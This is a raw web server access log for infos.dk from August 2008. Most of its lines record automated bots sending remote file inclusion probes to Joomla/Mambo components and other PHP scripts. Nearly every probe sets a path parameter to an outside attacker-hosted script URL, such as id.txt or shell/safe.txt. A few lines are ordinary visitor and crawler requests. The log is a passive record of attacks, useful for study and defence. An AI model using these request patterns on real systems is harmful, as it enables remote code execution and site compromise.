62.169.0.50 - - [02/Aug/2008:18:14:09 +0200] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
77.221.130.8 - - [02/Aug/2008:18:18:16 +0200] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
77.235.44.201 - - [02/Aug/2008:18:18:20 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
77.235.44.201 - - [02/Aug/2008:18:18:20 +0200] "GET //?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.814"
217.172.161.101 - - [02/Aug/2008:18:18:48 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:18:19:40 +0200] "GET /err-r_log-www.infos.dk//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
77.235.44.201 - - [02/Aug/2008:18:21:21 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.814"
77.235.44.201 - - [02/Aug/2008:18:21:21 +0200] "GET //?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.814"
83.170.114.48 - - [02/Aug/2008:18:23:16 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.19.204.226 - - [02/Aug/2008:18:24:47 +0200] "GET /newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
67.19.204.226 - - [02/Aug/2008:18:24:47 +0200] "GET /access_log-www.infos.dk/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
72.248.189.82 - - [02/Aug/2008:18:26:27 +0200] "GET /access_log-www.infos.dk/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.248.189.82 - - [02/Aug/2008:18:26:27 +0200] "GET /newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.254.226.234 - - [02/Aug/2008:18:34:01 +0200] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
83.170.114.48 - - [02/Aug/2008:18:34:03 +0200] "GET /err-r_log-www.infos.dk/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:18:34:03 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
208.80.193.32 - - [02/Aug/2008:18:34:42 +0200] "GET / HTTP/1.0" 200 3413 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50215)"
84.21.71.133 - - [02/Aug/2008:18:35:39 +0200] "GET /newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Aug/2008:18:35:39 +0200] "GET /err-r_log-www.infos.dk%20/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.248.189.82 - - [02/Aug/2008:18:36:07 +0200] "GET /err-r_log-www.infos.dk%20/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.19.204.226 - - [02/Aug/2008:18:36:22 +0200] "GET /err-r_log-www.infos.dk%20/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
58.65.228.5 - - [02/Aug/2008:18:39:46 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
58.65.228.5 - - [02/Aug/2008:18:39:46 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
58.65.228.5 - - [02/Aug/2008:18:39:47 +0200] "GET ///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
58.65.228.5 - - [02/Aug/2008:18:39:47 +0200] "GET ///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
87.106.102.225 - - [02/Aug/2008:18:39:49 +0200] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/wiwin261/shell/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.19.204.226 - - [02/Aug/2008:18:44:17 +0200] "GET /err-r_log-www.infos.dk/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
85.17.162.125 - - [02/Aug/2008:18:47:10 +0200] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.freexhost.info/users/gardhenal/mic22.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
89.186.1.54 - - [02/Aug/2008:18:49:42 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:18:49:43 +0200] "GET //?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.800"
85.214.41.164 - - [02/Aug/2008:18:51:09 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
85.18.81.164 - - [02/Aug/2008:18:51:20 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.orbitalcomics.com/idd.txt??? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.18.81.164 - - [02/Aug/2008:18:54:15 +0200] "GET /err-r_log-www.infos.dk%20//?path%5Bdocroot%5D=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
85.18.81.164 - - [02/Aug/2008:18:54:15 +0200] "GET //?path%5Bdocroot%5D=http://www.ukmotorauction.com/oh.txt???? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
203.146.15.54 - - [02/Aug/2008:18:55:14 +0200] "GET //errors.php?error=http://www.geocities.com/anangedan.com/ide.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
203.146.15.54 - - [02/Aug/2008:18:55:14 +0200] "GET //errors.php?error=http://www.geocities.com/anangedan.com/ide.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
89.186.1.54 - - [02/Aug/2008:18:58:38 +0200] "GET /err-r_log-www.infos.dk//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:18:58:39 +0200] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
87.106.102.225 - - [02/Aug/2008:18:59:42 +0200] "GET /err-r_log-www.infos.dk/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/wiwin261/shell/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
67.15.8.80 - - [02/Aug/2008:19:06:40 +0200] "GET /newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
67.15.8.80 - - [02/Aug/2008:19:06:47 +0200] "GET /access_log-www.infos.dk/newspublish/include.php?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
59.188.7.232 - - [02/Aug/2008:19:07:55 +0200] "GET /err-r_log-www.infos.dk//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:19:07:56 +0200] "GET //?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.803"
67.15.8.80 - - [02/Aug/2008:19:08:57 +0200] "GET //modules/tinycontent/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
67.15.8.80 - - [02/Aug/2008:19:08:57 +0200] "GET /err-r_log-www.infos.dk//modules/tinycontent/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
219.117.239.114 - - [02/Aug/2008:19:09:47 +0200] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
209.25.195.72 - - [02/Aug/2008:19:11:51 +0200] "GET /index.php?headfoot=yes&path[docroot]=http://www.velvetgold.net/card? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
82.194.67.123 - - [02/Aug/2008:19:12:46 +0200] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
87.106.28.93 - - [02/Aug/2008:19:14:00 +0200] "GET //?headfoot=yes&path[docroot]=http://www.velvetgold.net/card? HTTP/1.1" 200 3425 "-" "libwww-perl/5.805"
67.19.204.226 - - [02/Aug/2008:19:18:17 +0200] "GET //include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
67.19.204.226 - - [02/Aug/2008:19:18:17 +0200] "GET /err-r_log-www.infos.dk%20//include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
67.15.8.80 - - [02/Aug/2008:19:18:57 +0200] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
67.15.8.80 - - [02/Aug/2008:19:19:04 +0200] "GET /err-r_log-www.infos.dk//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
72.248.189.82 - - [02/Aug/2008:19:19:27 +0200] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.248.189.82 - - [02/Aug/2008:19:19:27 +0200] "GET /err-r_log-www.infos.dk%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
204.15.10.22 - - [02/Aug/2008:19:20:24 +0200] "GET //samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
67.19.204.226 - - [02/Aug/2008:19:20:42 +0200] "GET /err-r_log-www.infos.dk//include/admin.lib.inc.php?site_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.169.0.50 - - [02/Aug/2008:19:21:07 +0200] "GET //samplefaqsupport.php?path[docroot]=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
72.248.189.82 - - [02/Aug/2008:19:21:50 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
78.24.34.204 - - [02/Aug/2008:19:23:55 +0200] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://legalref.ru/config/idscan.txt? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
78.24.34.204 - - [02/Aug/2008:19:24:56 +0200] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
82.194.67.123 - - [02/Aug/2008:19:28:23 +0200] "GET /err-r_log-www.infos.dk/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
82.194.67.123 - - [02/Aug/2008:19:28:24 +0200] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
217.172.161.101 - - [02/Aug/2008:19:29:21 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:19:29:31 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
90.184.144.200 - - [02/Aug/2008:19:37:53 +0200] "GET /Data/side1.htm HTTP/1.1" 200 607 "http://images.google.dk/imgres?imgurl=http://www.infos.dk/Data/holger%2520danske.jpg&imgrefurl=http://www.infos.dk/Data/side1.htm&h=400&w=266&sz=20&hl=da&start=1&tbnid=IJgwyABbHUcMTM:&tbnh=124&tbnw=82&prev=/images%3Fq%3Dholger%2Bdanske%26gbv%3D2%26hl%3Dda%26rls%3Dig%26sa%3DG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
90.184.144.200 - - [02/Aug/2008:19:37:53 +0200] "GET /Data/holger%20danske.jpg HTTP/1.1" 200 20253 "http://www.infos.dk/Data/side1.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
90.184.144.200 - - [02/Aug/2008:19:37:54 +0200] "GET /Data/holger%20danske.jpg HTTP/1.1" 200 20253 "http://images.google.dk/imgres?imgurl=http://www.infos.dk/Data/holger%2520danske.jpg&imgrefurl=http://www.infos.dk/Data/side1.htm&h=400&w=266&sz=20&tbnid=IJgwyABbHUcMTM:&tbnh=124&tbnw=82&hl=da&prev=/images%3Fq%3Dholger%2Bdanske%26gbv%3D2%26hl%3Dda%26rls%3Dig%26sa%3DG&frame=small" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
90.184.144.200 - - [02/Aug/2008:19:37:54 +0200] "GET /favicon.ico HTTP/1.1" 302 214 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
66.34.204.26 - - [02/Aug/2008:19:38:05 +0200] "GET / HTTP/1.1" 200 3425 "http://www.keywordspy.com/keyword-research/infos.dk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)"
66.34.204.26 - - [02/Aug/2008:19:38:05 +0200] "GET / HTTP/1.1" 200 3425 "http://www.keywordspy.com/keyword-research/infos.dk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)"
66.34.204.26 - - [02/Aug/2008:19:38:05 +0200] "GET / HTTP/1.1" 200 3425 "http://www.keywordspy.com/keyword-research/infos.dk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)"
200.206.182.158 - - [02/Aug/2008:19:39:52 +0200] "GET ///vwar/backup/errors.php?error=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
216.14.124.10 - - [02/Aug/2008:19:40:33 +0200] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://vobucks.com/bo.do?? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
217.172.161.101 - - [02/Aug/2008:19:42:17 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:19:42:17 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:19:43:41 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:45:49 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:45:49 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:45:50 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:45:50 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:19:46:18 +0200] "GET /err-r_log-www.infos.dk//include/admin.lib.inc.php?site_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:46:39 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:46:39 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:47:02 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:47:02 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:19:51:23 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
64.185.237.77 - - [02/Aug/2008:19:52:50 +0200] "GET //?path%5Bdocroot%5D=http://217.33.34.85/FUJI/Styles/idd.txt??? HTTP/1.1" 200 3425 "-" "libwww-perl/5.810"
190.196.2.205 - - [02/Aug/2008:19:53:33 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
190.196.2.205 - - [02/Aug/2008:19:53:36 +0200] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
200.131.208.21 - - [02/Aug/2008:19:54:09 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:54:11 +0200] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:54:39 +0200] "GET /err-r_log-www.infos.dk%20///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:54:39 +0200] "GET ///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
81.169.158.65 - - [02/Aug/2008:19:54:59 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:54:59 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.131.208.21 - - [02/Aug/2008:19:55:05 +0200] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:55:05 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:55:24 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:19:55:26 +0200] "GET /errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
217.172.161.101 - - [02/Aug/2008:19:55:44 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
74.6.22.159 - - [02/Aug/2008:19:56:44 +0200] "GET /?M=A HTTP/1.0" 200 3413 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.169.158.65 - - [02/Aug/2008:19:57:06 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:19:57:07 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:01:05 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:01:05 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:20:01:40 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
200.131.208.21 - - [02/Aug/2008:20:02:23 +0200] "GET /err-r_log-www.infos.dk%20///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
200.131.208.21 - - [02/Aug/2008:20:02:24 +0200] "GET ///vwar/backup/errors.php?error=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
81.169.158.65 - - [02/Aug/2008:20:02:35 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:02:36 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:05:14 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:05:15 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:05:35 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:05:36 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
70.84.175.98 - - [02/Aug/2008:20:05:44 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
81.169.158.65 - - [02/Aug/2008:20:06:27 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:06:28 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:06:35 +0200] "GET /err-r_log-www.infos.dk/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
81.169.158.65 - - [02/Aug/2008:20:06:35 +0200] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
88.214.192.28 - - [02/Aug/2008:20:07:02 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
88.214.192.28 - - [02/Aug/2008:20:07:09 +0200] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.javva.com/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
